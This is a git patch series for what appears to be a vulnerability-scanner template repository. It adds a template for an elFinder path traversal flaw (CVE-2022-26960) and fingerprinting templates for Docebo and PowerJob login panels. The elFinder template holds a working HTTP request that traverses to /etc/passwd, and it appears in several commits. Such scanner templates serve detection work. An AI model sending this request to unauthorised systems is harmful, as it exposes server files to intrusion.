From ec5b5300251aa3828520e12626fd609af77403ee Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:18:26 -0400
Subject: [PATCH 01/10] Create CVE-2022-0543

---
 cves/2022/CVE-2022-0543 | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 cves/2022/CVE-2022-0543

diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543
new file mode 100644
index 0000000000..c259789775
--- /dev/null
+++ b/cves/2022/CVE-2022-0543
@@ -0,0 +1,25 @@
+id: CVE-2022-0543
+
+info:
+  name: elFinder - Path Traversal
+  author: PIKPIKCU
+  severity: critical
+  description: |
+    Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
+  reference:
+    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+  tags: cve,cve2022,lfi,elfinder
+
+requests:
+  - raw:
+      - |
+        GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"

From 789f6596456dccc59a2555b770e3651c54ec6e58 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:19:18 -0400
Subject: [PATCH 02/10] Update CVE-2022-0543

---
 cves/2022/CVE-2022-0543 | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543
index c259789775..015a33cf3d 100644
--- a/cves/2022/CVE-2022-0543
+++ b/cves/2022/CVE-2022-0543
@@ -2,7 +2,7 @@ id: CVE-2022-0543
 
 info:
   name: elFinder - Path Traversal
-  author: PIKPIKCU
+  author: pikpikcu
   severity: critical
   description: |
     Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.

From 732217c33ab59c3fc3e2c9cbb4a67be7f4abf502 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:29:04 -0400
Subject: [PATCH 03/10] Create docebo-detect.yaml

---
 technologies/docebo-detect.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 technologies/docebo-detect.yaml

diff --git a/technologies/docebo-detect.yaml b/technologies/docebo-detect.yaml
new file mode 100644
index 0000000000..95ff301e51
--- /dev/null
+++ b/technologies/docebo-detect.yaml
@@ -0,0 +1,25 @@
+id: docebo-detect
+
+info:
+  name: Docebo Detect
+  author: pikpikcu
+  severity: info
+  metadata:
+    fofa-query: title="Docebo E-learning"
+  tags: tech,docebo
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Docebo E-learning</title>"
+
+      - type: status
+        status:
+          - 200

From 6735f99a543652f086c1b4b10e9c47439d8d3f22 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:29:52 -0400
Subject: [PATCH 04/10] Delete CVE-2022-0543

---
 cves/2022/CVE-2022-0543 | 25 -------------------------
 1 file changed, 25 deletions(-)
 delete mode 100644 cves/2022/CVE-2022-0543

diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543
deleted file mode 100644
index 015a33cf3d..0000000000
--- a/cves/2022/CVE-2022-0543
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2022-0543
-
-info:
-  name: elFinder - Path Traversal
-  author: pikpikcu
-  severity: critical
-  description: |
-    Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
-  reference:
-    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
-  tags: cve,cve2022,lfi,elfinder
-
-requests:
-  - raw:
-      - |
-        GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "root:.*:0:0:"

From 53a775abd2c0a58d9185c5d9818e0988f634a119 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:31:46 -0400
Subject: [PATCH 05/10] Create CVE-2022-26960.yaml

---
 cves/2022/CVE-2022-26960.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 cves/2022/CVE-2022-26960.yaml

diff --git a/cves/2022/CVE-2022-26960.yaml b/cves/2022/CVE-2022-26960.yaml
new file mode 100644
index 0000000000..d524eab2d5
--- /dev/null
+++ b/cves/2022/CVE-2022-26960.yaml
@@ -0,0 +1,25 @@
+id: CVE-2022-26960
+
+info:
+  name: elFinder - Path Traversal
+  author: pikpikcu
+  severity: critical
+  description: |
+    Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
+  reference:
+    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+  tags: cve,cve2022,lfi,elfinder
+
+requests:
+  - raw:
+      - |
+        GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"

From f7153e19af2afa6b7c82ce13677702087571821a Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:51:40 -0400
Subject: [PATCH 06/10] Create powerjob-detect.yaml

---
 technologies/powerjob-detect.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 technologies/powerjob-detect.yaml

diff --git a/technologies/powerjob-detect.yaml b/technologies/powerjob-detect.yaml
new file mode 100644
index 0000000000..fae537f6af
--- /dev/null
+++ b/technologies/powerjob-detect.yaml
@@ -0,0 +1,25 @@
+id: powerjob-detect
+
+info:
+  name: PowerJob Detect
+  author: pikpikcu
+  severity: info
+  metadata:
+    fofa-query: title="PowerJob"
+  tags: tech,powerjob
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>PowerJob</title>"
+
+      - type: status
+        status:
+          - 200

From 8848779eae68c2e3af7671533c7a75109a855e70 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 4 Jul 2022 17:21:12 +0530
Subject: [PATCH 07/10] Update and rename technologies/docebo-detect.yaml to
 exposed-panels/docebo-elearning-panel.yaml

---
 .../docebo-elearning-panel.yaml                           | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
 rename technologies/docebo-detect.yaml => exposed-panels/docebo-elearning-panel.yaml (72%)

diff --git a/technologies/docebo-detect.yaml b/exposed-panels/docebo-elearning-panel.yaml
similarity index 72%
rename from technologies/docebo-detect.yaml
rename to exposed-panels/docebo-elearning-panel.yaml
index 95ff301e51..1144fc5667 100644
--- a/technologies/docebo-detect.yaml
+++ b/exposed-panels/docebo-elearning-panel.yaml
@@ -1,12 +1,12 @@
-id: docebo-detect
+id: docebo-elearning-panel
 
 info:
-  name: Docebo Detect
+  name: Docebo E-learning Login Panel
   author: pikpikcu
   severity: info
   metadata:
     fofa-query: title="Docebo E-learning"
-  tags: tech,docebo
+  tags: panel,docebo
 
 requests:
   - method: GET
@@ -18,7 +18,7 @@ requests:
       - type: word
         part: body
         words:
-          - "<title>Docebo E-learning</title>"
+          - "Docebo E-learning"
 
       - type: status
         status:

From 8a40ab6de85eba6c78bfde7a1c6ea0fbad7e205d Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 4 Jul 2022 17:25:24 +0530
Subject: [PATCH 08/10] Update and rename technologies/powerjob-detect.yaml to
 exposed-panels/powerjob-panel.yaml

---
 .../powerjob-panel.yaml                                    | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
 rename technologies/powerjob-detect.yaml => exposed-panels/powerjob-panel.yaml (78%)

diff --git a/technologies/powerjob-detect.yaml b/exposed-panels/powerjob-panel.yaml
similarity index 78%
rename from technologies/powerjob-detect.yaml
rename to exposed-panels/powerjob-panel.yaml
index fae537f6af..2cfd129e20 100644
--- a/technologies/powerjob-detect.yaml
+++ b/exposed-panels/powerjob-panel.yaml
@@ -1,12 +1,13 @@
-id: powerjob-detect
+id: powerjob-panel
 
 info:
-  name: PowerJob Detect
+  name: PowerJob Login Panel
   author: pikpikcu
   severity: info
   metadata:
+    verified: true
     fofa-query: title="PowerJob"
-  tags: tech,powerjob
+  tags: panel,powerjob
 
 requests:
   - method: GET

From d239dee390ad79b22bd681931c3cbf4d9fe2f9be Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 4 Jul 2022 17:25:32 +0530
Subject: [PATCH 09/10] Update docebo-elearning-panel.yaml

---
 exposed-panels/docebo-elearning-panel.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/exposed-panels/docebo-elearning-panel.yaml b/exposed-panels/docebo-elearning-panel.yaml
index 1144fc5667..1e0c7a6814 100644
--- a/exposed-panels/docebo-elearning-panel.yaml
+++ b/exposed-panels/docebo-elearning-panel.yaml
@@ -5,6 +5,7 @@ info:
   author: pikpikcu
   severity: info
   metadata:
+    verified: true
     fofa-query: title="Docebo E-learning"
   tags: panel,docebo
 

From 01e8acba05822a1dd74ffe6438d9f4af5eed27fd Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 4 Jul 2022 18:02:11 +0530
Subject: [PATCH 10/10] Update CVE-2022-26960.yaml

---
 cves/2022/CVE-2022-26960.yaml | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

diff --git a/cves/2022/CVE-2022-26960.yaml b/cves/2022/CVE-2022-26960.yaml
index d524eab2d5..6093524c0e 100644
--- a/cves/2022/CVE-2022-26960.yaml
+++ b/cves/2022/CVE-2022-26960.yaml
@@ -3,18 +3,20 @@ id: CVE-2022-26960
 info:
   name: elFinder - Path Traversal
   author: pikpikcu
-  severity: critical
+  severity: high
   description: |
     Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
   reference:
     - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
     - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+  metadata:
+    verified: true
   tags: cve,cve2022,lfi,elfinder
 
 requests:
   - raw:
       - |
-        GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
+        GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
@@ -23,3 +25,7 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200